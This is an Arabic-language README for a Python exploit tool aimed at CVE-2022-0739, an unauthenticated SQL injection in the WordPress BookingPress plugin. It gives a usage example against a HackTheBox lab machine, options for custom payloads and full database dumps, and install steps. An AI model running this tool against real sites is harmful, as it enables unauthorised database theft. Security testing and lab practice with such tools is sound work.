
استغلال لـ WP BookingPress (< 1.0.11) مبني على destr4ct POC.
محاولتي لاستغلال CVE-2022-0739 في BookingPress، بناءً على إثبات المفهوم (POC) لـ destr4ct - لكن بشكل أفضل.
مثال استخدام ضد جهاز MetaTwo من HackTheBox، الذي يستضيف ووردبريس مع إضافة bookingpress الضعيفة (الإصدار 1.0.10).
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)
options:
-h, --help show this help message and exit
-u URL, --url URL URL of WordPress server with vulnerable plugin (http://example.domain)
-o BASENAME, --out BASENAME
Output database schema and dump in JSON format
-p PAYLOAD, --payload PAYLOAD
Payload to inject. Should start with ')'
-a, --dump-all Enables whole DB dump
-v, --verbose Enables verbose mode
-n NONCE, --nonce NONCE
Nonce that you got as unauthenticated user
-nu NONCE_URL, --nonce-url NONCE_URL
URL where nonce can be extracted (bookingprss form page)
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt
TL:DR؛ لأغراض تعليمية فقط، لا تخرب أشياء لا تملكها أو ليس لديك إذن باختبارها. إذا استخدمت هذا البرنامج لأي غرض خبيث، فقد يصيب آلهة الأمن السيبراني حاسوبك ببرمجية خبيثة مدمرة لدرجة أنك ستتمنى لو اشتريت Mac.